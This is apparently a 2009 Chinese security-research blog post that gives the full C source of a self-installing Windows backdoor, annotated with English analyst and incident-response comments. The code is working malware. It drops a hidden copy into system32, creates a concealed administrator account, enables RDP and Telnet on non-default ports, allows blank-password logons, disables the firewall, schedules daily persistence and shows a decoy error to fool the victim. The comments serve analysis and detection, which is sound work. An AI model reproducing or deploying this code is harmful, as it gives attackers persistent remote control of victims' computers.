andy  

2009-01-03 17:28:14|  分类: 安全研究 |  标签: |举报 |字号 订阅

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#include <stdio.h>
#include <Windows.h>
// Self-installing Windows backdoor sample, exactly as posted. The notes below
// describe it from an analyst's standpoint: what it does, which artifacts it
// leaves behind, and what a responder has to undo. Everything stated here is
// read straight off the code; nothing is parameterised.
//
// Observable behaviour, in order:
//   1. copies its own executable to c:\WINDOWS\system32\andy.exe;
//   2. writes HKLM registry values that enable Remote Desktop, move the RDP
//      listener to port 521, hide the account "admin$" from the logon UI and
//      clear the LSA limitblankpassworduse / forceguest policies;
//   3. spawns a sequence of attrib / sc / net / at / tlntadmn commands that
//      create a local administrator "admin$", start the Schedule, NtLmSsp,
//      Telnet and Server services, stop the sharedaccess (firewall/ICS)
//      service, re-create the ipc$ and c$ shares, move Telnet to port 520,
//      and schedule the dropped copy to run every day at 22:39;
//   4. shows a decoy "file corrupted" message box and exits.
//
// Error handling: failures only reach printf(); the #pragma above links the
// binary as /subsystem:windows, so no console is attached and the messages
// go nowhere. Every step needs administrative rights (HKLM, system32,
// service control, account creation) and nothing checks for them.
// Return value: always 0, whatever succeeded.
int main(int argc, char* argv[]){
 // Step 1: locate the running executable and drop a copy into system32.
 TCHAR exeFullPath[MAX_PATH];
    ::GetModuleFileName(NULL,exeFullPath,MAX_PATH);
 // bFailIfExists == false: an existing andy.exe is overwritten silently.
 // IR note: the dropped file is later marked +s +h +r +a by the attrib
 // command below, so it does not show up in a plain directory listing.
 CopyFile(exeFullPath,"c:\\WINDOWS\\system32\\andy.exe",false);
 // Step 2: registry changes. Each block creates/opens one HKLM key with
 // KEY_ALL_ACCESS, writes one REG_DWORD and closes the handle.
 // NOTE(review): when RegCreateKeyEx fails the code only prints and then
 // passes the never-initialised hKey to RegSetValueEx and RegCloseKey.
 HKEY hKey;
 // dwValue (0) is written to the four policy values; dwValue1 (521) is the
 // new RDP listener port written to both PortNumber values.
 DWORD dwValue = 0;
 DWORD dwValue1 =521;
 // fDenyTSConnections = 0 turns Remote Desktop on (default is 1 = denied).
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) != ERROR_SUCCESS)
  printf("error 1");
 if (RegSetValueEx(hKey,"fDenyTSConnections",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 2");
 RegCloseKey(hKey);
 // Winlogon\SpecialAccounts\UserList\<name> = 0 hides that account from the
 // Welcome screen / User Accounts panel; the account itself is created by
 // the "net user" command further down. A value named after an unknown
 // account under this key is a strong indicator on its own.
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 3");
 if (RegSetValueEx(hKey,"admin$",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 4");
 RegCloseKey(hKey);
 // Lsa\limitblankpassworduse = 0 allows network logons with blank passwords
 // (default 1 restricts them to console logon).
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 5");
 if (RegSetValueEx(hKey,"limitblankpassworduse",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 6");
 RegCloseKey(hKey);
 // Lsa\forceguest = 0 switches network access from "Guest only" to
 // "Classic" so remote logons authenticate as the real account. Same key as
 // above is reopened rather than reused; the error numbers jump from 6 to 9.
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 9");
 if (RegSetValueEx(hKey,"forceguest",0,REG_DWORD,(CONST BYTE *)&dwValue,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 10");
 RegCloseKey(hKey);
 // Both RDP PortNumber values (the rdpwd\Tds\tcp and the WinStations\RDP-Tcp
 // one) are set to 521 so the listener no longer sits on the default 3389.
 // IR note: restore both to 3389 together; a mismatch is itself a symptom.
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 11");
 if (RegSetValueEx(hKey,"PortNumber",0,REG_DWORD,(CONST BYTE *)&dwValue1,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 12");
 RegCloseKey(hKey);
 if (RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL) !=ERROR_SUCCESS)
  printf("error 13");
 if (RegSetValueEx(hKey,"PortNumber",0,REG_DWORD,(CONST BYTE *)&dwValue1,sizeof(DWORD))!= ERROR_SUCCESS)
  printf("error 14");
 RegCloseKey(hKey);
 // Step 3: spawn child processes to run system commands.
 // dwFlags = 1 is STARTF_USESHOWWINDOW and wShowWindow = 0 is SW_HIDE, so
 // every child runs without a visible window. The same PROCESS_INFORMATION
 // is reused for each spawn and its process/thread handles are never closed
 // (one handle pair leaked per command). Nothing waits on a child before the
 // next one starts, so e.g. "net start schedule" is not guaranteed to have
 // finished before the "at" job is registered.
 // NOTE(review): CreateProcess documents lpCommandLine as a writable buffer;
 // string literals are passed here, which works on ANSI builds in practice
 // but is not guaranteed.
 // Detection: each of these command lines is visible in process-creation
 // telemetry (4688 / Sysmon event 1) as a child of this binary.
 STARTUPINFO info;
 PROCESS_INFORMATION process;
 memset(&info,0,sizeof(STARTUPINFO));
 info.cb=sizeof(info);
 info.dwFlags=1;
 info.wShowWindow=0;
 // Hide the dropped copy (system + hidden + read-only + archive).
 if(!::CreateProcess(NULL,"attrib +s +h +r +a C:\\windows\\system32\\andy.exe",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 15");
 // Task Scheduler service set to auto-start and started; needed for "at".
 if(!::CreateProcess(NULL,"sc config schedule start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 16");
 if(!::CreateProcess(NULL,"net start schedule",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 17");
 // Local account "admin$" is created and added to Administrators. The
 // trailing "$" is presumably meant to make it look like a machine account
 // or an admin share. IR note: remove the account and audit what it touched
 // (event 4720 / 4732 for creation and group membership).
 if(!::CreateProcess(NULL,"net user admin$ admin /add",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 18");
 if(!::CreateProcess(NULL,"net localgroup administrators admin$ /add",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 19");
 // NTLM security support provider service set to auto-start and started.
 if(!::CreateProcess(NULL,"sc config NtLmSsp start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 20");
 if(!::CreateProcess(NULL,"net start NtLmSsp",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 21");
 // Telnet service set to auto-start and started.
 if(!::CreateProcess(NULL,"sc config TlntSvr start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 22");
 if(!::CreateProcess(NULL,"net start TlntSvr",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 23");
 // sharedaccess is the Windows Firewall / Internet Connection Sharing
 // service: it is stopped and set to disabled so the new listeners are
 // reachable. IR note: re-enable it and check the firewall policy.
 if(!::CreateProcess(NULL,"net stop sharedaccess",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 24");
 if(!::CreateProcess(NULL,"sc config sharedaccess start= disabled",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 25");
 // Server and Workstation services started (the shares below need them);
 // note Lanmanserver is started before it is configured.
 if(!::CreateProcess(NULL,"net start Lanmanserver",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 26");
 if(!::CreateProcess(NULL,"sc config Lanmanserver start= AUTO",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 27");
 if(!::CreateProcess(NULL,"net start lanmanworkstation",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 28");
 // Persistence: an "at" job runs the dropped copy every day of the week at
 // 22:39. IR note: list and delete it with "at" / schtasks and check
 // C:\windows\Tasks for *.job files (hidden by the last attrib below).
 if(!::CreateProcess(NULL,"at 22:39 /every:M,T,W,Th,F,S,Su C:\\windows\\system32\\andy.exe",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 29");
 // Admin shares ipc$ and c$ are (re-)created.
 if(!::CreateProcess(NULL,"net share ipc$",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 31");
 if(!::CreateProcess(NULL,"net share c$=c:",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 32");
 // Telnet is reconfigured: NTLM authentication removed and port moved to
 // 520. IR note: a Telnet listener on a non-default port with password
 // auth only is worth alerting on regardless of this sample.
 if(!::CreateProcess(NULL,"tlntadmn config sec = -ntlm",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 33");
 if(!::CreateProcess(NULL,"tlntadmn config port=520",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 34");
 // Hide the scheduled-task files. (Error numbering is out of sequence: 30
 // comes after 34.)
 if(!::CreateProcess(NULL,"attrib +s +h +a +r C:\\windows\\Tasks\\*.job",NULL,NULL,FALSE,0,NULL,NULL,&info,&process))
  printf("error 30");
 // Step 4: decoy dialog. Text reads "File corrupted, please re-download or
 // reinstall!" with the title "System notice", so the victim believes the
 // program simply failed.
 ::MessageBox(NULL, "文件损坏,请重新下载或安装!", "系统提示", MB_OK);
 return 0;
}